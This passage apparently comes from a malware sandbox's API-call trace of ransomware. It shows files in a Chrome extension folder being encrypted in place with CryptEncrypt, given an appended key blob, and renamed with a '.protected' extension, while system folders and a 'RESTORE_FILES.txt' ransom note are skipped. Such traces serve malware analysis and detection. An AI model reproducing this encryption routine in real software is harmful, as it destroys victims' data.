nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.259] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.259] CloseHandle (hObject=0x160) returned 1 [0083.259] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.protected") returned 162 [0083.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.protected")) returned 1 [0083.260] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="Windows") returned -1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="Program Files") returned -1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="Program Files (x86)") returned -1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="$Recycle.bin") returned 1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="System Volume Information") returned -1 [0083.260] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js") returned 157 [0083.260] StrStrIW (lpFirst="feedback_script.js", lpSrch=".protected") returned 0x0 [0083.260] lstrcmpW (lpString1="feedback_script.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.260] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.260] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js") returned 157 [0083.261] StrStrW (lpFirst="feedback_script.js", lpSrch=".txt") returned 0x0 [0083.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js") returned 157 [0083.261] StrStrW (lpFirst="feedback_script.js", lpSrch=".rar") returned 0x0 [0083.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js") returned 157 [0083.261] StrStrW (lpFirst="feedback_script.js", lpSrch=".zip") returned 0x0 [0083.261] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.269] SetFilePointerEx (in: hFile=0x160, 
liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.269] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.269] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.269] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.270] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.270] CloseHandle (hObject=0x160) returned 1 [0083.270] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.protected") returned 167 [0083.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js.protected")) returned 1 [0083.271] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0083.271] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0083.271] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json") returned 152 [0083.271] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0083.271] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.271] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.271] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 
[0083.272] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json") returned 152 [0083.272] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0083.272] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json") returned 152 [0083.272] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0083.272] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json") returned 152 [0083.272] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0083.272] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x8f8, lpOverlapped=0x0) returned 1 [0083.273] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.273] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x8f8, lpOverlapped=0x0) returned 1 [0083.274] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.274] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.274] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.274] CloseHandle (hObject=0x160) returned 1 [0083.274] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.protected") returned 162 [0083.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.protected")) returned 1 [0083.275] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="Windows") returned -1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="Program Files") returned -1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="Program Files (x86)") returned -1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="$Recycle.bin") returned 1 [0083.275] lstrcmpiW (lpString1="material_css_min.css", lpString2="System Volume Information") returned -1 [0083.275] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css") returned 159 [0083.275] StrStrIW (lpFirst="material_css_min.css", lpSrch=".protected") returned 0x0 [0083.275] lstrcmpW (lpString1="material_css_min.css", lpString2="RESTORE_FILES.txt") returned -1 [0083.275] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.275] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css") returned 159 [0083.276] StrStrW (lpFirst="material_css_min.css", lpSrch=".txt") returned 0x0 [0083.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css") returned 159 [0083.276] StrStrW (lpFirst="material_css_min.css", lpSrch=".rar") returned 0x0 [0083.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css") returned 159 [0083.276] StrStrW (lpFirst="material_css_min.css", lpSrch=".zip") returned 0x0 [0083.276] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.289] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.289] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.289] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.289] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.295] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.295] CloseHandle (hObject=0x160) returned 1 [0083.296] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.protected") returned 169 [0083.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\material_css_min.css.protected")) returned 1 [0083.297] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="Windows") returned -1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="Program Files") returned -1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="Program Files (x86)") returned -1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="$Recycle.bin") returned 1 [0083.297] lstrcmpiW (lpString1="mirroring_cast_streaming.js", lpString2="System Volume Information") returned -1 [0083.297] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js") returned 166 [0083.297] StrStrIW (lpFirst="mirroring_cast_streaming.js", lpSrch=".protected") returned 0x0 [0083.297] lstrcmpW (lpString1="mirroring_cast_streaming.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.297] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.297] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js") returned 166 [0083.298] StrStrW (lpFirst="mirroring_cast_streaming.js", lpSrch=".txt") returned 0x0 [0083.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js") returned 166 [0083.298] StrStrW (lpFirst="mirroring_cast_streaming.js", lpSrch=".rar") returned 0x0 [0083.298] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js") returned 166 [0083.298] StrStrW (lpFirst="mirroring_cast_streaming.js", lpSrch=".zip") returned 0x0 [0083.298] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.304] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.304] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.304] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.304] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.305] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.305] CloseHandle (hObject=0x160) returned 1 [0083.305] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.protected") returned 176 [0083.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js.protected")) returned 1 [0083.306] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="Windows") returned -1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="Program Files") returned -1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="Program Files (x86)") returned -1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="$Recycle.bin") returned 1 [0083.306] lstrcmpiW (lpString1="mirroring_common.js", lpString2="System Volume Information") returned -1 [0083.306] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js") returned 158 [0083.306] StrStrIW (lpFirst="mirroring_common.js", lpSrch=".protected") returned 0x0 [0083.306] lstrcmpW (lpString1="mirroring_common.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.306] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.306] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
